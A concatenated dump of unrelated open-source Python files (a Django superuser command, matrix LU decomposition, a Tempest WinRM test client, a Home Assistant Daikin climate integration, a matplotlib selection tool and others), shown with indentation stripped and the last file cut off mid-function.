class Command(BaseCommand):
help = 'Used to create a superuser.'
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.UserModel = get_user_model()
self.username_field = self.UserModel._meta.get_field(self.UserModel.USERNAME_FIELD)
def add_arguments(self, parser):
parser.add_argument('--%s' % self.UserModel.USERNAME_FIELD,
dest=self.UserModel.USERNAME_FIELD, default=None,
help='Specifies the login for the superuser.')
parser.add_argument('--noinput', action='store_false', dest='interactive', default=True,
help=('Tells Django to NOT prompt the user for input of any kind. '
'You must use --%s with --noinput, along with an option for '
'any other required field. Superusers created with --noinput will '
' not be able to log in until they\'re given a valid password.' %
self.UserModel.USERNAME_FIELD))
parser.add_argument('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS,
help='Specifies the database to use. Default is "default".')
for field in self.UserModel.REQUIRED_FIELDS:
parser.add_argument('--%s' % field, dest=field, default=None,
help='Specifies the %s for the superuser.' % field)
def execute(self, *args, **options):
self.stdin = options.get('stdin', sys.stdin) # Used for testing
return super(Command, self).execute(*args, **options)
def handle(self, *args, **options):
username = options.get(self.UserModel.USERNAME_FIELD, None)
database = options.get('database')
# If not provided, create the user with an unusable password
password = None
user_data = {}
# Do quick and dirty validation if --noinput
if not options['interactive']:
try:
if not username:
raise CommandError("You must use --%s with --noinput." %
self.UserModel.USERNAME_FIELD)
username = self.username_field.clean(username, None)
for field_name in self.UserModel.REQUIRED_FIELDS:
if options.get(field_name):
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = field.clean(options[field_name], None)
else:
raise CommandError("You must use --%s with --noinput." % field_name)
except exceptions.ValidationError as e:
raise CommandError('; '.join(e.messages))
else:
# Prompt for username/password, and any other required fields.
# Enclose this whole thing in a try/except to catch
# KeyboardInterrupt and exit gracefully.
default_username = get_default_username()
try:
if hasattr(self.stdin, 'isatty') and not self.stdin.isatty():
raise NotRunningInTTYException("Not running in a TTY")
# Get a username
verbose_field_name = self.username_field.verbose_name
while username is None:
input_msg = capfirst(verbose_field_name)
if default_username:
input_msg += " (leave blank to use '%s')" % default_username
username_rel = self.username_field.rel
input_msg = force_str('%s%s: ' % (
input_msg,
' (%s.%s)' % (
username_rel.to._meta.object_name,
username_rel.field_name
) if username_rel else '')
)
username = self.get_input_data(self.username_field, input_msg, default_username)
if not username:
continue
try:
self.UserModel._default_manager.db_manager(database).get_by_natural_key(username)
except self.UserModel.DoesNotExist:
pass
else:
self.stderr.write("Error: That %s is already taken." %
verbose_field_name)
username = None
for field_name in self.UserModel.REQUIRED_FIELDS:
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = options.get(field_name)
while user_data[field_name] is None:
message = force_str('%s%s: ' % (capfirst(field.verbose_name),
' (%s.%s)' % (field.rel.to._meta.object_name, field.rel.field_name) if field.rel else ''))
user_data[field_name] = self.get_input_data(field, message)
# Get a password
while password is None:
if not password:
password = getpass.getpass()
password2 = getpass.getpass(force_str('Password (again): '))
if password != password2:
self.stderr.write("Error: Your passwords didn't match.")
password = None
continue
if password.strip() == '':
self.stderr.write("Error: Blank passwords aren't allowed.")
password = None
continue
except KeyboardInterrupt:
self.stderr.write("\nOperation cancelled.")
sys.exit(1)
except NotRunningInTTYException:
self.stdout.write(
"Superuser creation skipped due to not running in a TTY. "
"You can run `manage.py createsuperuser` in your project "
"to create one manually."
)
if username:
user_data[self.UserModel.USERNAME_FIELD] = username
user_data['password'] = password
self.UserModel._default_manager.db_manager(database).create_superuser(**user_data)
if options['verbosity'] >= 1:
self.stdout.write("Superuser created successfully.")
def get_input_data(self, field, message, default=None):
"""
Override this method if you want to customize data inputs or
validation exceptions.
"""
raw_value = input(message)
if default and raw_value == '':
raw_value = default
try:
val = field.clean(raw_value, None)
except exceptions.ValidationError as e:
self.stderr.write("Error: %s" % '; '.join(e.messages))
val = None
return val
|
maxmalysh/congenial-octo-adventure
|
refs/heads/master
|
report1/task1_compact.py
|
1
|
import numpy as np
from typing import List
from enum import Enum
from scipy import sparse
from random import randint
class PivotMode(Enum):
BY_ROW = 0
BY_COLUMN = 1
BY_MATRIX = 2
SPARSE = 3
def pivot_by_row(A: np.matrix, k: int, rp: List[float]):
mat_size = A.shape[0]
r_max_lead = k
for i in range(k + 1, mat_size):
if abs(A[rp[i], k]) > abs(A[rp[r_max_lead], k]):
r_max_lead = i
if r_max_lead != k:
row_perm_k_saved = rp[k]
rp[k] = rp[r_max_lead]
rp[r_max_lead] = row_perm_k_saved
def pivot_by_column(A: np.matrix, k: int, cp: List[float]):
mat_size = A.shape[0]
c_max_lead = k
for i in range(k + 1, mat_size):
if abs(A[k, cp[i]]) > abs(A[k, cp[c_max_lead]]):
c_max_lead = i
if c_max_lead != k:
column_perm_k_saved = cp[k]
cp[k] = cp[c_max_lead]
cp[c_max_lead] = column_perm_k_saved
def pivot_by_matrix(A: np.matrix, k: int, rp: List[float], cp: List[float]):
mat_size = A.shape[0]
r_max_lead = k
c_max_lead = k
for i in range(k + 1, mat_size):
for j in range(k + 1, mat_size):
if abs(A[rp[i], cp[j]]) > abs(
A[rp[r_max_lead], cp[c_max_lead]]):
r_max_lead = i
c_max_lead = j
if r_max_lead != k:
row_perm_k_saved = rp[k]
rp[k] = rp[r_max_lead]
rp[r_max_lead] = row_perm_k_saved
if c_max_lead != k:
column_perm_k_saved = cp[k]
cp[k] = cp[c_max_lead]
cp[c_max_lead] = column_perm_k_saved
def reverse_permutation(perm: List[int]):
rev_perm = [0] * len(perm)
for i in range(len(perm)):
rev_perm[perm[i]] = i
return rev_perm
def pivot_sparse(A: sparse.dok_matrix, k: int, rp: List[float], cp: List[float]):
n = A.shape[0]
B = np.zeros((n - k, n - k),
dtype=np.integer)
B_ = np.zeros((n - k, n - k),
dtype=np.integer)
rp_rev = reverse_permutation(rp)
cp_rev = reverse_permutation(cp)
A_keys = A.keys() if isinstance(A, sparse.spmatrix) else [
x for x in np.ndindex(A.shape) if A[x] != 0
]
for i_permuted, j_permuted in A_keys:
i = rp_rev[i_permuted] - k
j = cp_rev[j_permuted] - k
if i < 0 or j < 0:
continue
if A[i_permuted, j_permuted] != 0:
B[i, j] = 1
else:
B_[i, j] = 1
G = B @ B_.transpose() @ B
epsilon = 1e-08
g_min_idxs = []
A_keys = A.keys() if isinstance(A, sparse.spmatrix) else [
x for x in np.ndindex(A.shape) if A[x] != 0
]
for i_permuted, j_permuted in A_keys:
i = rp_rev[i_permuted] - k
j = cp_rev[j_permuted] - k
if i < 0 or j < 0:
continue
if abs(A[i_permuted, j_permuted]) < epsilon:
continue
if len(g_min_idxs) == 0:
g_min_idxs.append((i, j))
if G[i, j] < G[g_min_idxs[0]]:
g_min_idxs.clear()
g_min_idxs.append((i, j))
elif G[i, j] == G[g_min_idxs[0]]:
g_min_idxs.append((i, j))
if len(g_min_idxs) == 0:
raise ValueError("No non-almost-zero elements in A submatrix")
g_chosen = g_min_idxs[0]
for g_idx in g_min_idxs:
if abs(A[rp[g_idx[0] + k], cp[g_idx[1] + k]]) \
> abs(A[rp[g_chosen[0] + k], cp[g_chosen[1] + k]]):
g_chosen = g_idx
r_chosen_lead = g_chosen[0] + k
c_chosen_lead = g_chosen[1] + k
row_perm_k_saved = rp[k]
rp[k] = rp[r_chosen_lead]
rp[r_chosen_lead] = row_perm_k_saved
column_perm_k_saved = cp[k]
cp[k] = cp[c_chosen_lead]
cp[c_chosen_lead] = column_perm_k_saved
def pivot(A: np.matrix, k: int, mode: PivotMode, rp: List[float], cp: List[float]):
if mode == PivotMode.BY_ROW:
pivot_by_row(A, k, rp)
elif mode == PivotMode.BY_COLUMN:
pivot_by_column(A, k, cp)
elif mode == PivotMode.BY_MATRIX:
pivot_by_matrix(A, k, rp, cp)
elif mode == PivotMode.SPARSE:
pivot_sparse(A, k, rp, cp)
def lu_decompose_pivoting(A: np.matrix, mode: PivotMode):
n = A.shape[0]
rp = [i for i in range(n)]
cp = [i for i in range(n)]
for k in range(0, n):
pivot(A, k, mode, rp, cp)
for j in range(k + 1, n):
A[rp[k], cp[j]] /= A[rp[k], cp[k]]
for i in range(k + 1, n):
for j in range(k + 1, n):
A[rp[i], cp[j]] -= A[rp[k], cp[j]] * A[rp[i], cp[k]]
return A, rp, cp
def lpu_decompose(A: np.matrix) -> (np.matrix, np.matrix, np.matrix):
A = A.copy()
n = A.shape[0]
L = np.identity(A.shape[0])
U = np.identity(A.shape[0])
for k in range(0, n):
nonzero_elems_j_indices = np.nonzero(A[k])[0]
if len(nonzero_elems_j_indices) != 0:
first_nonzero_elem_j = nonzero_elems_j_indices[0]
else:
raise ValueError("Singular matrix provided!")
first_nonzero_elem = A[k, first_nonzero_elem_j]
for j in range(0, n):
A[k, j] /= first_nonzero_elem
L[k, k] = first_nonzero_elem
for s in range(k + 1, n):
multiplier = A[s, first_nonzero_elem_j]
for j in range(0, n):
A[s, j] -= A[k, j] * multiplier
L[s, k] = multiplier
for t in range(first_nonzero_elem_j + 1, n):
multiplier = A[k, t] / A[k, first_nonzero_elem_j]
for i in range(0, n):
A[i, t] -= A[i, first_nonzero_elem_j] * multiplier
U[first_nonzero_elem_j, t] = multiplier
P = A
return L, P, U
def lpl_decompose(A: np.matrix) -> (np.matrix, np.matrix, np.matrix):
Q = np.identity(A.shape[0])
Q = Q[::-1]
L, P, U = lpu_decompose(A @ Q)
Ls = Q @ U @ Q
return L, (P @ Q), Ls
def lu_extract(LU: np.matrix, rp: List[float], cp: List[float]):
mat_size = LU.shape[0]
L = np.zeros((mat_size, mat_size))
U = np.zeros((mat_size, mat_size))
for i in range(mat_size):
for j in range(mat_size):
if j > i:
U[i, j] = LU[rp[i], cp[j]]
elif j < i:
L[i, j] = LU[rp[i], cp[j]]
elif j == i:
L[i, j] = LU[rp[i], cp[j]]
U[i, j] = 1
return L, U
def lr_decompose_pivoting(A: np.matrix, mode: PivotMode):
n = A.shape[0]
rp = [i for i in range(n)]
cp = [i for i in range(n)]
for k in range(0, n):
pivot(A, k, mode, rp, cp)
for i in range(k + 1, n):
divider = A[rp[i], cp[k]] / A[rp[k], cp[k]]
A[rp[i], cp[k]] = divider
for j in range(k + 1, n):
A[rp[i], cp[j]] -= A[rp[k], cp[j]] * divider
return A, rp, cp
def lr_extract(LU: np.matrix, rp: List[float], cp: List[float]):
mat_size = LU.shape[0]
L = np.zeros((mat_size, mat_size))
U = np.zeros((mat_size, mat_size))
for i in range(mat_size):
for j in range(mat_size):
if j > i:
U[i, j] = LU[rp[i], cp[j]]
elif j < i:
L[i, j] = LU[rp[i], cp[j]]
elif j == i:
U[i, j] = LU[rp[i], cp[j]]
L[i, j] = 1
return L, U
def perm_vector_to_matrix(vector, row=True):
n = len(vector)
matrix = np.zeros(shape=(n, n))
for i in range(0, n):
if row:
matrix[vector[i], i] = 1
else:
matrix[i, vector[i]] = 1
return matrix
def PLU_decomposition(A):
mode = PivotMode.BY_ROW
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, U
def LUP_decomposition(A):
mode = PivotMode.BY_COLUMN
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return L, U, perm_vector_to_matrix(P_, row=False)
def PLUP_decomposition(A):
mode = PivotMode.BY_MATRIX
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, U, \
perm_vector_to_matrix(P_, row=False)
def PLR_decomposition(A):
mode = PivotMode.BY_ROW
lr_in_one, P, P_ = lr_decompose_pivoting(A.copy(), mode)
L, R = lr_extract(lr_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, R
def Sparse_decomposition(A):
mode = PivotMode.SPARSE
lu_in_one, P, P_ = lu_decompose_pivoting(A.copy(), mode)
L, U = lu_extract(lu_in_one, P, P_)
return perm_vector_to_matrix(P, row=True), L, U, \
perm_vector_to_matrix(P_, row=False)
|
ritchyteam/odoo
|
refs/heads/master
|
addons/document/wizard/__init__.py
|
444
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import document_configuration
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Conjuror/fxos-certsuite
|
refs/heads/master
|
mcts/utils/handlers/__init__.py
|
25
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
|
zsoltdudas/lis-tempest
|
refs/heads/LIS
|
tempest/common/utils/windows/remote_client.py
|
2
|
#!/usr/bin/python
# Copyright 2014 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from winrm import protocol
LOG = log.getLogger(__name__)
SUCCESS_RETURN_CODE = 0
class WinRemoteClient(object):
def __init__(self, hostname, username, password):
self.hostname = 'https://' + hostname + ':5986/wsman'
self.username = username
self.password = password
def run_wsman_cmd(self, cmd):
protocol.Protocol.DEFAULT_TIMEOUT = "PT3600S"
try:
p = protocol.Protocol(endpoint=self.hostname,
transport='plaintext',
username=self.username,
password=self.password)
shell_id = p.open_shell()
command_id = p.run_command(shell_id, cmd)
std_out, std_err, status_code = p.get_command_output(
shell_id, command_id)
p.cleanup_command(shell_id, command_id)
p.close_shell(shell_id)
return (std_out, std_err, status_code)
except Exception as exc:
LOG.exception(exc)
raise exc
def run_powershell_cmd(self, *args, **kvargs):
list_args = " ".join(args)
kv_args = " ".join(["-%s %s" % (k, v) for k, v in kvargs.iteritems()])
full_cmd = "%s %s %s" % ('powershell', list_args, kv_args)
s_out, s_err, r_code = self.run_wsman_cmd(full_cmd)
if r_code != SUCCESS_RETURN_CODE:
raise Exception("Command execution failed with code %(code)s:\n"
"Command: %(cmd)s\n"
"Output: %(output)s\n"
"Error: %(error)s" % {
'code': r_code,
'cmd': full_cmd,
'output': s_out,
'error': s_err})
LOG.info('Command %(cmd)s result: %(output)s',
{'cmd': full_cmd, 'output': s_out})
return s_out
def get_powershell_cmd_attribute(self, *args, **kvargs):
cmd = args[0]
attribute = args[1]
kv_args = " ".join(["-%s %s" % (k, v) for k, v in kvargs.iteritems()])
full_cmd = "%s (%s %s).%s" % ('powershell', cmd, kv_args, attribute)
s_out, s_err, r_code = self.run_wsman_cmd(full_cmd)
if r_code != SUCCESS_RETURN_CODE:
raise Exception("Command execution failed with code %(code)s:\n"
"Command: %(cmd)s\n"
"Output: %(output)s\n"
"Error: %(error)s" % {
'code': r_code,
'cmd': full_cmd,
'output': s_out,
'error': s_err})
LOG.info('Command %(cmd)s result: %(output)s',
{'cmd': full_cmd, 'output': s_out})
return s_out
|
antepsis/anteplahmacun
|
refs/heads/master
|
sympy/deprecated/class_registry.py
|
26
|
from sympy.core.decorators import deprecated
from sympy.core.core import BasicMeta, Registry, all_classes
class ClassRegistry(Registry):
"""
Namespace for SymPy classes
This is needed to avoid problems with cyclic imports.
To get a SymPy class, use `C.<class_name>` e.g. `C.Rational`, `C.Add`.
For performance reasons, this is coupled with a set `all_classes` holding
the classes, which should not be modified directly.
"""
__slots__ = []
def __setattr__(self, name, cls):
Registry.__setattr__(self, name, cls)
all_classes.add(cls)
def __delattr__(self, name):
cls = getattr(self, name)
Registry.__delattr__(self, name)
# The same class could have different names, so make sure
# it's really gone from C before removing it from all_classes.
if cls not in self.__class__.__dict__.itervalues():
all_classes.remove(cls)
@deprecated(
feature='C, including its class ClassRegistry,',
last_supported_version='1.0',
useinstead='direct imports from the defining module',
issue=9371,
deprecated_since_version='1.0')
def __getattr__(self, name):
return any(cls.__name__ == name for cls in all_classes)
C = ClassRegistry()
C.BasicMeta = BasicMeta
|
starrify/scrapy
|
refs/heads/master
|
tests/CrawlerProcess/asyncio_enabled_reactor.py
|
7
|
import asyncio
from twisted.internet import asyncioreactor
asyncioreactor.install(asyncio.get_event_loop())
import scrapy
from scrapy.crawler import CrawlerProcess
class NoRequestsSpider(scrapy.Spider):
name = 'no_request'
def start_requests(self):
return []
process = CrawlerProcess(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
process.crawl(NoRequestsSpider)
process.start()
|
sdague/home-assistant
|
refs/heads/dev
|
homeassistant/components/daikin/climate.py
|
16
|
"""Support for the Daikin HVAC."""
import logging
import voluptuous as vol
from homeassistant.components.climate import PLATFORM_SCHEMA, ClimateEntity
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
ATTR_HVAC_MODE,
ATTR_PRESET_MODE,
ATTR_SWING_MODE,
HVAC_MODE_COOL,
HVAC_MODE_DRY,
HVAC_MODE_FAN_ONLY,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_BOOST,
PRESET_ECO,
PRESET_NONE,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import ATTR_TEMPERATURE, CONF_HOST, CONF_NAME, TEMP_CELSIUS
import homeassistant.helpers.config_validation as cv
from . import DOMAIN as DAIKIN_DOMAIN
from .const import (
ATTR_INSIDE_TEMPERATURE,
ATTR_OUTSIDE_TEMPERATURE,
ATTR_STATE_OFF,
ATTR_STATE_ON,
ATTR_TARGET_TEMPERATURE,
)
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_HOST): cv.string, vol.Optional(CONF_NAME): cv.string}
)
HA_STATE_TO_DAIKIN = {
HVAC_MODE_FAN_ONLY: "fan",
HVAC_MODE_DRY: "dry",
HVAC_MODE_COOL: "cool",
HVAC_MODE_HEAT: "hot",
HVAC_MODE_HEAT_COOL: "auto",
HVAC_MODE_OFF: "off",
}
DAIKIN_TO_HA_STATE = {
"fan": HVAC_MODE_FAN_ONLY,
"dry": HVAC_MODE_DRY,
"cool": HVAC_MODE_COOL,
"hot": HVAC_MODE_HEAT,
"auto": HVAC_MODE_HEAT_COOL,
"off": HVAC_MODE_OFF,
}
HA_PRESET_TO_DAIKIN = {
PRESET_AWAY: "on",
PRESET_NONE: "off",
PRESET_BOOST: "powerful",
PRESET_ECO: "econo",
}
HA_ATTR_TO_DAIKIN = {
ATTR_PRESET_MODE: "en_hol",
ATTR_HVAC_MODE: "mode",
ATTR_FAN_MODE: "f_rate",
ATTR_SWING_MODE: "f_dir",
ATTR_INSIDE_TEMPERATURE: "htemp",
ATTR_OUTSIDE_TEMPERATURE: "otemp",
ATTR_TARGET_TEMPERATURE: "stemp",
}
DAIKIN_ATTR_ADVANCED = "adv"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up the Daikin HVAC platform.
Can only be called when a user accidentally mentions the platform in their
config. But even in that case it would have been ignored.
"""
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Daikin climate based on config_entry."""
daikin_api = hass.data[DAIKIN_DOMAIN].get(entry.entry_id)
async_add_entities([DaikinClimate(daikin_api)], update_before_add=True)
class DaikinClimate(ClimateEntity):
"""Representation of a Daikin HVAC."""
def __init__(self, api):
"""Initialize the climate device."""
self._api = api
self._list = {
ATTR_HVAC_MODE: list(HA_STATE_TO_DAIKIN),
ATTR_FAN_MODE: self._api.device.fan_rate,
ATTR_SWING_MODE: self._api.device.swing_modes,
}
self._supported_features = SUPPORT_TARGET_TEMPERATURE
if (
self._api.device.support_away_mode
or self._api.device.support_advanced_modes
):
self._supported_features |= SUPPORT_PRESET_MODE
if self._api.device.support_fan_rate:
self._supported_features |= SUPPORT_FAN_MODE
if self._api.device.support_swing_mode:
self._supported_features |= SUPPORT_SWING_MODE
async def _set(self, settings):
"""Set device settings using API."""
values = {}
for attr in [ATTR_TEMPERATURE, ATTR_FAN_MODE, ATTR_SWING_MODE, ATTR_HVAC_MODE]:
value = settings.get(attr)
if value is None:
continue
daikin_attr = HA_ATTR_TO_DAIKIN.get(attr)
if daikin_attr is not None:
if attr == ATTR_HVAC_MODE:
values[daikin_attr] = HA_STATE_TO_DAIKIN[value]
elif value in self._list[attr]:
values[daikin_attr] = value.lower()
else:
_LOGGER.error("Invalid value %s for %s", attr, value)
# temperature
elif attr == ATTR_TEMPERATURE:
try:
values[HA_ATTR_TO_DAIKIN[ATTR_TARGET_TEMPERATURE]] = str(int(value))
except ValueError:
_LOGGER.error("Invalid temperature %s", value)
if values:
await self._api.device.set(values)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._supported_features
@property
def name(self):
"""Return the name of the thermostat, if any."""
return self._api.name
@property
def unique_id(self):
"""Return a unique ID."""
return self._api.device.mac
@property
def temperature_unit(self):
"""Return the unit of measurement which this thermostat uses."""
return TEMP_CELSIUS
@property
def current_temperature(self):
"""Return the current temperature."""
return self._api.device.inside_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._api.device.target_temperature
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return 1
async def async_set_temperature(self, **kwargs):
"""Set new target temperature."""
await self._set(kwargs)
@property
def hvac_mode(self):
"""Return current operation ie. heat, cool, idle."""
daikin_mode = self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_HVAC_MODE])[1]
return DAIKIN_TO_HA_STATE.get(daikin_mode, HVAC_MODE_HEAT_COOL)
@property
def hvac_modes(self):
"""Return the list of available operation modes."""
return self._list.get(ATTR_HVAC_MODE)
async def async_set_hvac_mode(self, hvac_mode):
"""Set HVAC mode."""
await self._set({ATTR_HVAC_MODE: hvac_mode})
@property
def fan_mode(self):
"""Return the fan setting."""
return self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_FAN_MODE])[1].title()
async def async_set_fan_mode(self, fan_mode):
"""Set fan mode."""
await self._set({ATTR_FAN_MODE: fan_mode})
@property
def fan_modes(self):
"""List of available fan modes."""
return self._list.get(ATTR_FAN_MODE)
@property
def swing_mode(self):
"""Return the fan setting."""
return self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_SWING_MODE])[1].title()
async def async_set_swing_mode(self, swing_mode):
"""Set new target temperature."""
await self._set({ATTR_SWING_MODE: swing_mode})
@property
def swing_modes(self):
"""List of available swing modes."""
return self._list.get(ATTR_SWING_MODE)
@property
def preset_mode(self):
"""Return the preset_mode."""
if (
self._api.device.represent(HA_ATTR_TO_DAIKIN[ATTR_PRESET_MODE])[1]
== HA_PRESET_TO_DAIKIN[PRESET_AWAY]
):
return PRESET_AWAY
if (
HA_PRESET_TO_DAIKIN[PRESET_BOOST]
in self._api.device.represent(DAIKIN_ATTR_ADVANCED)[1]
):
return PRESET_BOOST
if (
HA_PRESET_TO_DAIKIN[PRESET_ECO]
in self._api.device.represent(DAIKIN_ATTR_ADVANCED)[1]
):
return PRESET_ECO
return PRESET_NONE
async def async_set_preset_mode(self, preset_mode):
"""Set preset mode."""
if preset_mode == PRESET_AWAY:
await self._api.device.set_holiday(ATTR_STATE_ON)
elif preset_mode == PRESET_BOOST:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_BOOST], ATTR_STATE_ON
)
elif preset_mode == PRESET_ECO:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_ECO], ATTR_STATE_ON
)
else:
if self.preset_mode == PRESET_AWAY:
await self._api.device.set_holiday(ATTR_STATE_OFF)
elif self.preset_mode == PRESET_BOOST:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_BOOST], ATTR_STATE_OFF
)
elif self.preset_mode == PRESET_ECO:
await self._api.device.set_advanced_mode(
HA_PRESET_TO_DAIKIN[PRESET_ECO], ATTR_STATE_OFF
)
@property
def preset_modes(self):
"""List of available preset modes."""
ret = [PRESET_NONE]
if self._api.device.support_away_mode:
ret.append(PRESET_AWAY)
if self._api.device.support_advanced_modes:
ret += [PRESET_ECO, PRESET_BOOST]
return ret
async def async_update(self):
"""Retrieve latest state."""
await self._api.async_update()
async def async_turn_on(self):
"""Turn device on."""
await self._api.device.set({})
async def async_turn_off(self):
"""Turn device off."""
await self._api.device.set(
{HA_ATTR_TO_DAIKIN[ATTR_HVAC_MODE]: HA_STATE_TO_DAIKIN[HVAC_MODE_OFF]}
)
@property
def device_info(self):
"""Return a device description for device registry."""
return self._api.device_info
|
111t8e/h2o-2
|
refs/heads/master
|
py/testdir_rpy2/test_expr_rpy2.py
|
8
|
import unittest, random, sys, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_browse as h2b, h2o_exec as h2e, h2o_import as h2i, h2o_cmd, h2o_util
import rpy2.robjects as robjects
import h2o_eqns
import math
print "run some random expressions (using h2o_eqn.py) in exec and R and compare results (eventually)"
exprList = [
]
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1, java_heap_GB=28)
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_expr_rpy2(self):
for k in range(20):
a = random.randint(1,10)
# b = random.randint(49,50)
b = random.randint(1,10)
c = random.randint(0,3)
for k in range(50):
execExpr = "a=" + str(h2o_eqns.Expression(a, b, c)) + ";"
(resultExec, hResult) = h2e.exec_expr(execExpr=execExpr)
print "h2o:", hResult
rResult = robjects.r(execExpr)[0]
print "R:", rResult
if math.isinf(rResult):
# covers pos/neg inf?
if not 'Infinity' in str(hResult):
raise Exception("h2o: %s R: %s not equal" % (hResult, rResult))
elif math.isnan(rResult):
if not 'NaN' in str(hResult):
raise Exception("h2o: %s R: %s not equal" % (hResult, rResult))
elif 'Infinity' in str(hResult) or'NaN' in str(hResult):
raise Exception("h2o: %s R: %s not equal" % (hResult, rResult))
else:
# skip Inf
# don't do logicals..h2o 1/0, R True/False
h2o_util.assertApproxEqual(rResult, hResult, tol=1e-12, msg='mismatch h2o/R expression result')
if __name__ == '__main__':
h2o.unit_main()
|
kkozarev/mwacme
|
refs/heads/master
|
MS_Inspect_menu_version/RectSelect.py
|
1
|
##########################################################################
############################## RectSelect ###############################
###########################################################################
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np
import copy
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, \
NavigationToolbar2TkAgg
from matplotlib.figure import Figure
import matplotlib.patches as patches
import sys
if sys.version_info[0] < 3:
import Tkinter as tk
else: # Python3
import tkinter as tk
class RectSelect:
"""
The class represents the rectangle selection tool
start and end are coordinate pairs (x,y)
The functions with names starting with __upd are the callback routines.
"""
def __init__(self, momPanel):
self.momPanel = momPanel # One of the plot windows (Panels)
self.fig = momPanel.fig
self.ax = momPanel.ax
self.patch = None
#self.sel = momPanel.sel # List of already selected points
def draw(self, start, end):
""" Draw the rectangle """
wid = end[0] - start[0]
hei = end[1] - start[1]
return patches.Rectangle(start, wid, hei, ec='k', fill=False, fc='c', \
ls='dashed', lw=0.7)
def autodraw(self, **opts):
""" Setup automatic drawing; supports command option """
self.start = None
# self.fig.canvas is momPanel.canvas
self.fig.canvas.mpl_connect('button_press_event', self.__upd_press)
self.fig.canvas.mpl_connect('motion_notify_event', self.__upd_motion)
self.fig.canvas.mpl_connect('button_release_event', self.__upd_release)
self.fig.canvas.mpl_connect('key_press_event', self.__upd_key)
#self._command = opts.pop('command', lambda *args: None)
#self.rectopts = opts
def __upd_key(self, event):
if event.key == 'esc':
if self.patch is not None:
self.patch.remove()
def __upd_press(self, event):
if event.inaxes <> self.ax: return # Beyond data window: ========= >>>
if self.start == None:
x = event.xdata
y = event.ydata
if x <> None and y <> None:
self.start = [x,y]
self.fig.canvas.show()
def __upd_motion(self, event):
if event.inaxes <> self.ax: return # Beyond data window: ========= >>>
if self.patch is not None:
self.patch.remove()
x = event.xdata
y = event.ydata
if self.start <> None and x <> None and y <> None:
self.patch = self.draw(self.start, [x,y])
self.ax.add_artist(self.patch)
self.fig.canvas.show()
def __upd_release(self, event):
if self.patch is None: # return # Click without motion detected
return
mom = self.momPanel
extn = self.patch.get_bbox().extents
ex0, ey0, ex1, ey1 = extn
if self.patch is not None:
self.patch.remove() # Do not leave the dashed rectangle visible
self.start = None
self.patch = None
self.fig.canvas.show()
#
# Make the extents to be always in correct order:
# x0 < x1 and y0 < y1
#
x0 = ex0
x1 = ex1
if ex0 > ex1:
x0 = ex1
x1 = ex0
y0 = ey0
y1 = ey1
if ey0 > ey1:
y0 = ey1
y1 = ey0
#
# The graph points
#
x = mom.xdata[mom.Xscale][mom.Xkey]
y = mom.ydata[mom.Yscale][mom.Ykey]
#
# Find the graph points covered by the rectangle patch
#
sel = np.where((x >= x0) & (x <= x1) & (y >= y0) & (y <= y1))[0]
if len(sel) == 0:
return # =========== NO POINTS SELECTED =============== >>>
#
# Remove all the flagged data points from selection
#
